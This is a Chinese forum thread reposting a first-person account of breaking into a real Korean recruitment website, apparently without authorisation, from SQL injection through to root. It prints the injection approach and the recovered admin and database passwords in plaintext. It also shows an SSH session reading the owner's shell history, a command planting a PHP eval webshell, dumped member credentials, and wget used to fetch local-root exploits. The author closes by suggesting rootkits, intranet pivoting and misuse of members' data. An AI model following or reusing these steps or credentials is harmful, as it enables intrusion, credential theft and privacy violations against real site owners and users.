[分享]巧妙渗透:从注射点直接到root_VMware, Unix及操作系统讨论区_Weblogic技术|Tuxedo技术|中间件技术|Oracle论坛|JAVA论坛|Linux/Unix技术|hadoop论坛_联动北方技术论坛  
网站首页 | 关于我们 | 服务中心 | 经验交流 | 公司荣誉 | 成功案例 | 合作伙伴 | 联系我们 |
联动北方-国内领先的云技术服务提供商
»  游客             当前位置:  论坛首页 »  自由讨论区 »  VMware, Unix及操作系统讨论区 »
总帖数
2
每页帖数
101/1页1
返回列表
0
发起投票  发起投票 发新帖子
查看: 3535 | 回复: 1   主题: [分享]巧妙渗透:从注射点直接到root        下一篇 
    本主题由 Administrator 于 2014-11-13 17:07:07 移动
fozhyn
注册用户
等级:上士
经验:317
发帖:101
精华:0
注册:2011-10-18
状态:离线
发送短消息息给fozhyn 加好友    发送短消息息给fozhyn 发消息
发表于: IP:您无权察看 2014-11-12 11:48:53 | [全部帖] [楼主帖] 楼主

说明:来这里潜水也有些日子了,看大家都很热情,就把自己的几篇拙文发来献丑了,还希望大家多多指教呀 :)对了,本文好像投给了黑防9月,现在发出来应该没关系了。

    韩国网站美观确实做得不错,这个网站就吸引了我。网站性质为在线招聘,类似于国内的中华英才网和51job,在熟悉网站架构和应用逻辑的同时,我粗略浏览了一下网站内容。发现韩元真是不值钱 :)

    点着点着,不一会儿就发现了一个注射点,字符型的,用order by猜出字段数为43后开始尝试获取内容,见下图:

javascript:contentimage(this);> javascript:contentimage(this); file="attachments/month_0912/09122600188d47fe2db1522b58.jpg" status="2" outfunc="null" initialized="true" unselectable="true">


 发现“3”和“4”两处可以显示内容,那么把“3”替换为user(),把“4”替换为version()后回车,如图:

javascript:contentimage(this);> javascript:contentimage(this); file="attachments/month_0912/091226002354124e35d36d02df.png" status="2">


 MYSQL的版本为4.0.22,那就有点繁琐了,没有information_schema这个库,无法直接跑数据,只能手工猜解了。

    在把“4”替换为database()后看到了当前数据库为jobcruit,见下图:

javascript:contentimage(this);> javascript:contentimage(this); file="attachments/month_0912/0912260023cd3884be1928894a.jpg" status="2">


 非root用户并不代表一定不能load_file或者导出一个webshell呀,我们来看看当前用户是否具有file权限:

javascript:contentimage(this);> javascript:contentimage(this); file="attachments/month_0912/09122600250186d0a5b6695a5c.jpg" status="2">


 很遗憾,没有file权限,同时还发现magic_quotes_gpc为on。

    那么目前的处境只能猜解数据进后台然后想办法得webshell了。先来看看是否存在admin表:

javascript:contentimage(this);> javascript:contentimage(this); file="attachments/month_0912/0912260025cfcd9b15e88ae5e7.jpg" status="2">


 不存在,我又试了几个常见的比如admin_info,admin_user等等表,但却都不存在。此刻有些郁闷了,于是又回到网站上浏览目录,也没什么发现。转向google,搜索site:jobcruit.co.kr后返回400多项结果,不多。很快便发现一个有趣的目录:rankup_module,很可能是某个名为rankup的系统,那表名的前缀也极有可能就是rankup,于是我再次猜测:

javascript:contentimage(this);> javascript:contentimage(this); file="attachments/month_0912/0912260023f020dae6c69dff6a.jpg" status="2">


 啊哈,存在,很好 :)那么看看admin:

javascript:contentimage(this);> javascript:contentimage(this); file="attachments/month_0912/0912260023d7628dba845bdfb5.jpg" status="2" outfunc="null" initialized="true" unselectable="true">


 太棒了,管理员表果真就是rankup_admin,那么我们继续猜列名:

javascript:contentimage(this);> javascript:contentimage(this); file="attachments/month_0912/0912260024a40867ca53799485.jpg" status="2" outfunc="null" initialized="true" unselectable="true">


 字段名id存在,至于用户名和密码字段,先不急猜解,我们先找到后台再说。根据站点的应用逻辑,我很快找到了后台,可是,却出现了意想不到的情况,如图:

javascript:contentimage(this);> javascript:contentimage(this); file="attachments/month_0912/0912260029d3ab62bb61ae7c3a.jpg" status="2">


 尝试login.php结果如下:

javascript:contentimage(this);> javascript:contentimage(this); file="attachments/month_0912/0912260029cbcfde11bca3cf7a.jpg" status="2" outfunc="null" initialized="true" unselectable="true">


 下载 (25.04 KB)

    后台无法登陆,难道是必须要前台登陆后才能进后台吗?

    首页有普通会员登陆框,通常来说按照程序员的逻辑惯性,管理登陆的字段名往往和普通会员相同。我们看一下首页的源码:

javascript:contentimage(this);> javascript:contentimage(this); file="attachments/month_0912/091226002983cbf94b27f7ea86.jpg" status="2" outfunc="null" initialized="true" unselectable="true">


 看到了吗?密码字段名为passwd,呵呵,先猜出一个用户再说:

javascript:contentimage(this);> javascript:contentimage(this); file="attachments/month_0912/09122600299f0ecdacb05818f5.jpg" status="2" outfunc="null" initialized="true" unselectable="true">


 使用这个用户成功登陆前台:

javascript:contentimage(this);> javascript:contentimage(this); file="attachments/month_0912/0912260029f995ecbf2b274bc0.jpg" status="2" outfunc="null" initialized="true" unselectable="true">


 发现有上传的地方,试试直接上传一个shell看:

javascript:contentimage(this);> javascript:contentimage(this); file="attachments/month_0912/0912260029ca367f0ff8faa287.jpg" status="2" outfunc="null" initialized="true" unselectable="true">


 很遗憾,对文件扩展名做了限制,只能上传jgp,bmp,gif和png的附件 :( 不管它,现在既然已经有了一个普通用户的cookies,那直接访问后台看看,然而,结果跟前面一样,还是不行……

    回到前台上传的地方,修改文件头后再次上传还是不行,不停修改文件扩展名,超长等方式都尝试了,仍然不行,看来这个地方没得搞。

    这下有点郁闷了,后台是摆设?还是做了什么奇怪的限制?

    转念一想,站点通过ftp管理,而我现在可以获得后台的管理员用户数据,即使不能登录后台,但也可以用来试试ftp。因为按照我的经验,很多站长的后台密码都跟FTP密码相同 :)

    说干就干,开始猜解管理员数据:

javascript:contentimage(this);> javascript:contentimage(this); file="attachments/month_0912/091226002911a32903e342be18.jpg" status="2" outfunc="null" initialized="true" unselectable="true">


 很顺利的拿到了管理员的用户名和密码。而之前已经知道当前数据库用户为jobcruit,因此很有可能FTP用户名也为jobcruit,确认一下后发现确实如此:

javascript:contentimage(this); file="attachments/month_0912/0912260029391c42109efef918.jpg" status="2" outfunc="null" initialized="true" unselectable="true">


 接下来先不急登录,ping一下域名后发现服务器或外围防火墙没有过滤ICMP包,能够ping通,那么用nmap扫描一下端口先:

nmap -v -sV -O 211.*.*.105
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
22/tcp open ssh OpenSSH 3.9p1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp qmail smtpd
80/tcp open http Apache httpd
110/tcp open pop3 qmail pop3d
443/tcp open http Apache httpd
873/tcp open rsync (protocol version 30)
1311/tcp open ssl/http Dell OpenManage httpd
3306/tcp open mysql MySQL (unauthorized)


 怀着忐忑不安的心情连上VPN后开启putty进行连接:

javascript:contentimage(this);> javascript:contentimage(this); file="attachments/month_0912/0912260038b818f30e36f516ef.jpg" status="2" outfunc="null" initialized="true" unselectable="true">
[jobcruit@wa64-054 ~]$ pwd
/home/hosting_users/jobcruit
[jobcruit@wa64-054 ~]$ ls -ls
total 54300
4 drwxr-xr-x 3 jobcruit jobcruit 4096 Apr 10 09:29 021906
40076 -rw-r--r-- 1 jobcruit jobcruit 40989557 Apr 10 10:53 backup.tar.gz
14216 -rw-r--r-- 1 jobcruit jobcruit 14533068 Jun 12 04:32 jobcruit-2009-06-12.dump
0 -rw-r--r-- 1 jobcruit jobcruit 0 Apr 10 09:33 scoreboard
4 drwxr-xr-x 21 jobcruit jobcruit 4096 Apr 24 17:36 www
[jobcruit@wa64-054 ~]$ ls -la
total 54364
drwxr-x--- 4 jobcruit jobcruit 4096 Jul 13 12:48 .
drwx-----x 892 root root 28672 Jul 9 17:29 ..
drwxr-xr-x 3 jobcruit jobcruit 4096 Apr 10 09:29 021906
-rw-r--r-- 1 jobcruit jobcruit 40989557 Apr 10 10:53 backup.tar.gz
-rw------- 1 jobcruit jobcruit 1048 Apr 24 17:37 .bash_history
-rw------- 1 jobcruit jobcruit 358 Apr 9 07:34 .bash_profile
-rw-r--r-- 1 jobcruit jobcruit 12218 Jul 13 12:48 .ftpaccess
-rwxr--r-- 1 jobcruit jobcruit 29 Apr 9 07:34 .htaccess
-rw-r--r-- 1 jobcruit jobcruit 14533068 Jun 12 04:32 jobcruit-2009-06-12.dump
-rw------- 1 jobcruit jobcruit 316 Apr 24 17:36 .mysql_history
-rw-r--r-- 1 jobcruit jobcruit 0 Apr 10 09:33 scoreboard
-rw------- 1 jobcruit jobcruit 748 Apr 24 17:36 .viminfo
drwxr-xr-x 21 jobcruit jobcruit 4096 Apr 24 17:36 www
[jobcruit@wa64-054 ~]$ uname -a
Linux wa64-054.cafe24.com 2.6.24.2 #1 SMP Thu Feb 14 18:00:23 KST 2008 x86_64 x86_64 x86_64 GNU/Linux


 2.6.24的内核,脑中反应出几个exp:vmsplice, kmod2以及近期才爆出来的几个。

[jobcruit@wa64-054 ~]$ id
uid=1680(jobcruit) gid=1680(jobcruit) groups=1680(jobcruit)
[jobcruit@wa64-054 ~]$ w
14:23:37 up 103 days, 9:08, 1 user, load average: 1.02, 1.07, 1.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
jobcruit pts/0 xxx.xxx.xxx.xxx 14:21 1.00s 0.00s 0.00s sshd: jobcruit [priv]
[jobcruit@wa64-054 new]$ uptime
12:35:14 up 104 days, 7:20, 2 users, load average: 0.66, 0.66, 0.95


 服务器已经连续开启104天了,很不错 :)

[jobcruit@wa64-054 ~]$ cat /etc/hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost.localdomain localhost
211.196.153.105 wa64-054.cafe24.com wa64-054


 来看看/etc/passwd的内容,以免数据太多造成刷屏,只取前100行:

[jobcruit@wa64-054 ~]$ head -100 /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
htt:x:100:101:IIIMF Htt:/usr/lib64/im:/sbin/nologin
mysql:x:500:500::/home/mysql:/sbin/nologin
alias:x:501:501::/var/qmail/alias:/bin/bash
qmaild:x:502:501::/var/qmail:/bin/bash
qmaill:x:503:501::/var/qmail:/bin/bash
qmailp:x:504:501::/var/qmail:/bin/bash
qmailq:x:505:502::/var/qmail:/bin/bash
qmailr:x:506:502::/var/qmail:/bin/bash
qmails:x:507:502::/var/qmail:/bin/bash
vpopmail:x:508:503::/home/vpopmail:/bin/bash
cafe24:x:509:509::/home/cafe24:/bin/bash
quota100:x:601:601::/tmp:/bin/false
quota200:x:602:602::/tmp:/bin/false
…………
[jobcruit@wa64-054 ~]$ cat .htaccess
PHP_FLAG register_globals ON
[jobcruit@wa64-054 ~]$ head -20 .ftpaccess
<Limit ALL>
Allow 202.6.95.0/24
Allow 202.14.103.0/24
Allow 202.14.165.0/24
Allow 202.21.0.0/21
Allow 202.20.82.0/24
Allow 202.20.83.0/24
Allow 202.20.84.0/23
Allow 202.20.86.0/24
Allow 202.20.128.0/17
Allow 202.20.99.0/24
Allow 202.20.119.0/24
Allow 202.30.0.0/15
Allow 203.252.0.0/14
Allow 203.248.0.0/14
Allow 203.244.0.0/14
Allow 203.240.0.0/14
Allow 203.224.0.0/16
Allow 203.236.0.0/14
Allow 203.225.0.0/16
[jobcruit@wa64-054 ~]$


 查看该用户曾经执行过的命令:

[jobcruit@wa64-054 ~]$ cat .bash_history
ll
cd www
ll
cd backup/
ll
cd ..
ll
cd Lill
cd ..
ll
cd www
ll
mysql -hlocalhost -ujobcruit -pjob0329 jobcruit
mysql -hlocalhost -ujobcruit -pjob0329 jobcruit <backup20090409.sql
ll
chmod 777 PEG/
ll
cd wysiwyg/
ll
chmod 777 PEG
chmod 777 PEG_temp/
ll
cd ..
ll
ll
chmod 777 RAD/PEG/
ll
cd rankup_module/
ll
chmod 777 rankup_board/attach/
chmod 777 rankup_board/attach/*
ll
cd rankup_dbback/
ll
chmod 777 backup_list/
ll
cd ..
ll
cd rankup_payment/
ll
cd inicis/
ll
chmod 777 log/
ll
cd ../../
mysql -hlocalhost -ujobcruit -pjob0329 jobcruit
ll
cd ..
ll
cp ./Libs/_php/rankup_connection.class.php ../
cp ./Libs/_php/rankup_db.class.php ../
cd ..
ll
vi rankup_db.class.php
rm rankup_db.class.php
vi .Htaccess
…………


 很好,获得了当前用户mysql的密码 :)并且知道该用户喜欢777,不好的习惯喔!

    再来看看他在mysql里面都做过些什么:

[jobcruit@wa64-054 ~]$ cat .mysql_history
show tables;
show create table rankuplog_ip;
alter table rankuplog_ip add index content(`content`);
alter table rankuplog_domain modify content varchar(80);
alter table rankuplog_domain add index content(`content`);
show tables;
select *from rankup_admin;
select * from rankup_admin;
show create table rankuplog_ip;


 回到网站,来看看网站都有哪些子目录:

[jobcruit@wa64-054 ~]$ cd www
[jobcruit@wa64-054 www]$ pwd
/home/hosting_users/jobcruit/www
[jobcruit@wa64-054 www]$ ls -la
total 4912
drwxr-xr-x 21 jobcruit jobcruit 4096 Apr 24 17:36 .
drwxr-x--- 4 jobcruit jobcruit 4096 Jul 13 12:48 ..


 drwxr-xr-x 3 jobcruit jobcruit 4096 Feb 19 20:49 馆措府累诀

drwx-----x 3 jobcruit jobcruit 4096 Nov 21 2008 arbeit
drwx-----x 2 jobcruit jobcruit 4096 Feb 20 16:33 backup
-rw-r--r-- 1 jobcruit jobcruit 4849088 Apr 9 11:21 backup20090409.sql
drwx-----x 2 jobcruit jobcruit 4096 Nov 21 2008 board
-rw-r--r-- 1 jobcruit jobcruit 28 Apr 24 17:36 .htaccess
drwxr-xr-x 3 jobcruit jobcruit 36864 Jan 7 2009 images
drwx-----x 4 jobcruit jobcruit 4096 Feb 19 23:15 include
-rw-r--r-- 1 jobcruit jobcruit 1314 Jan 8 2009 index.html
-rw-r--r-- 1 jobcruit jobcruit 17 Dec 18 2008 info.php
drwxr-xr-x 2 jobcruit jobcruit 4096 Apr 10 10:28 ioncube
drwx-----x 6 jobcruit jobcruit 4096 Nov 21 2008 Libs
drwx-----x 3 jobcruit jobcruit 4096 Feb 14 17:47 main
drwx-----x 2 jobcruit jobcruit 4096 Nov 21 2008 mypage
drwx-----x 2 jobcruit jobcruit 4096 Nov 21 2008 pay
drwxrwxrwx 2 jobcruit jobcruit 36864 Jul 12 15:58 PEG
drwxr-xr-x 10 jobcruit jobcruit 4096 Feb 12 12:17 phpmyadmin
drwx-----x 8 jobcruit jobcruit 4096 Nov 21 2008 RAD
drwx-----x 31 jobcruit jobcruit 4096 Jan 9 2009 rankup_module
drwx-----x 2 jobcruit jobcruit 4096 Nov 21 2008 search
-rw-r--r-- 1 jobcruit jobcruit 120 Jan 7 2009 site_working.html
drwxr-xr-x 2 jobcruit jobcruit 4096 Jan 10 2009 web_log
drwx-----x 4 jobcruit jobcruit 4096 Dec 5 2008 work
drwx-----x 5 jobcruit jobcruit 4096 Nov 21 2008 wysiwyg
[jobcruit@wa64-054 www]$ cat .htaccess
php_flag allow_url_fopen on


 接下来找找jobcruit这个用户在/etc/passwd中的情况:

[jobcruit@wa64-054 rankup_etc]$ grep "jobcruit" /etc/passwd
jobcruit:x:1680:1680::/home/hosting_users/jobcruit:/home/bin/bash


 为了保险起见,先写个php一句话后门上去:

[jobcruit@wa64-054 rankup_log]$ echo -e "<?php @eval(\$_POST[md5])?>" >rankuplog_time.php
[jobcruit@wa64-054 rankup_log]$ cat rankuplog_time.php
<?php @eval($_POST[md5])?>
[jobcruit@wa64-054 rankup_log]$


 出于好奇心,进他数据库看看:

[jobcruit@wa64-054 tmp]$ mysql -ujobcruit -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 72106689 to server version: 4.0.22-log
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql>
mysql> show databases;
+----------+
| Database |
+----------+
| jobcruit |
+----------+
1 row in set (0.01 sec)
mysql> use jobcruit;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql>
mysql> show tables;
+-----------------------------------+
| Tables_in_jobcruit |
+-----------------------------------+
| rankup_admin |
| rankup_arbeit_employ |
| rankup_arbeit_employ_data |
| rankup_arbeit_resume |
| rankup_arbeit_resume_data |
| rankup_banner |
| rankup_board_adult1 |
| rankup_board_bbss |
| rankup_board_board1 |
| rankup_board_board11 |
| rankup_board_board13 |
| rankup_board_board2 |
| rankup_board_board21 |
| rankup_board_board22 |
| rankup_board_boardarea |
| rankup_board_boarddi |
| rankup_board_boardjob |
…………
225 rows in set (0.00 sec)


 来看看管理表的结构:

mysql> describe rankup_admin;
+--------+----------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+--------+----------+------+-----+---------+-------+
| id | char(20) | | PRI | | |
| passwd | char(41) | YES | | NULL | |
+--------+----------+------+-----+---------+-------+
2 rows in set (0.00 sec)


 再看看是否有其他管理员:

mysql> select id,passwd from rankup_admin;
+---------+---------+
| id | passwd |
+---------+---------+
| kloveyh | job0329 |
+---------+---------+
1 row in set (0.00 sec)
mysql> describe rankup_member;
+--------+------------------+------+-----+---------------------+----------------+
| Field | Type | Null | Key | Default | Extra |
+--------+------------------+------+-----+---------------------+----------------+
| no | int(10) unsigned | | PRI | NULL | auto_increment |
| uid | char(20) | | UNI | | |
| kind | char(20) | YES | | NULL | |
| passwd | char(20) | | | | |
| name | char(20) | | MUL | | |
| open | enum('yes','no') | | | yes | |
| valid | enum('yes','no') | | | no | |
| wdate | datetime | | | 0000-00-00 00:00:00 | |
| etc01 | char(20) | YES | | NULL | |
| etc02 | char(20) | YES | | NULL | |
+--------+------------------+------+-----+---------------------+----------------+
10 rows in set (0.00 sec)
mysql> select uid,passwd from rankup_member where no =1;
+--------+--------+
| uid | passwd |
+--------+--------+
| rankup | rankup |
+--------+--------+
1 row in set (0.00 sec)


 来看看有多少会员:

mysql> select count(*) from rankup_member;
+----------+
| count(*) |
+----------+
| 621 |
+----------+
1 row in set (0.00 sec)


 才621个,不多嘛,有些失望,不过这些会员的数据可以拿来做韩国的字典?了解韩国人的某某习惯?呵呵,利用价值就请各位看官开动脑筋了。

    好奇心也不是无限度的,下面准备提权:

[jobcruit@wa64-054 new]$ head -100 /etc/issue
CentOS release 4.6 (Final)
Kernel \r on an \m
[jobcruit@wa64-054 new]$ ifconfig
-bash: ifconfig: command not found
[jobcruit@wa64-054 new]$ chkconfig -list
-bash: chkconfig: command not found


 权限很有限啊 :(

    看看内核相关的包都装了哪些:

    [jobcruit@wa64-054 new]$ rpm -qa | grep kernel

    kernel-2.6.9-42.EL

    kernel-devel-2.6.9-42.0.3.EL

    kernel-smp-2.6.9-67.0.15.EL

    kernel-largesmp-devel-2.6.9-67.0.22.EL

    kernel-largesmp-devel-2.6.9-67.0.15.EL

    kernel-devel-2.6.9-67.0.22.EL

    kernel-utils-2.4-13.1.105

    kernel-smp-2.6.9-42.EL

    kernel-devel-2.6.9-42.EL

    kernel-2.6.9-42.0.3.EL

    kernel-smp-2.6.9-42.0.3.EL

    kernel-devel-2.6.9-67.0.15.EL

    kernel-smp-devel-2.6.9-67.0.15.EL

    kernel-smp-devel-2.6.9-67.0.22.EL

    kernel-smp-2.6.9-67.0.22.EL

    前面已经知道内核版本为2.6.24,在ping某韩国网站后发现可以外连,随即用wget下载了针对2.6.24内核以及2.6.x的所有exploit进行提权,但是均告失败 :(

    最后在多次尝试之下终于用某个非内核local root exploit提权成功(读者可自行上去练习,注意安全),我成为了root :) 至于下一步该做什么,比如破解root密码,安装rootkit,或是继续进行内网渗透,那就视目的而定了。

--转自 北京联动北方科技有限公司


该贴由system转至本版2014-11-13 17:07:07



赞(0)    操作        顶端 
wulcan
版主
等级:中校
经验:1795
发帖:124
精华:0
注册:2014-3-19
状态:离线
发送短消息息给wulcan 加好友    发送短消息息给wulcan 发消息
发表于: IP:您无权察看 2014-11-28 8:18:57 | [全部帖] [楼主帖] 2  楼

此文当成小说看还凑合,实用价值不高。



赞(0)    操作        顶端 
总帖数
2
每页帖数
101/1页1
返回列表
发新帖子
请输入验证码: 点击刷新验证码
您需要登录后才可以回帖 登录 | 注册
技术讨论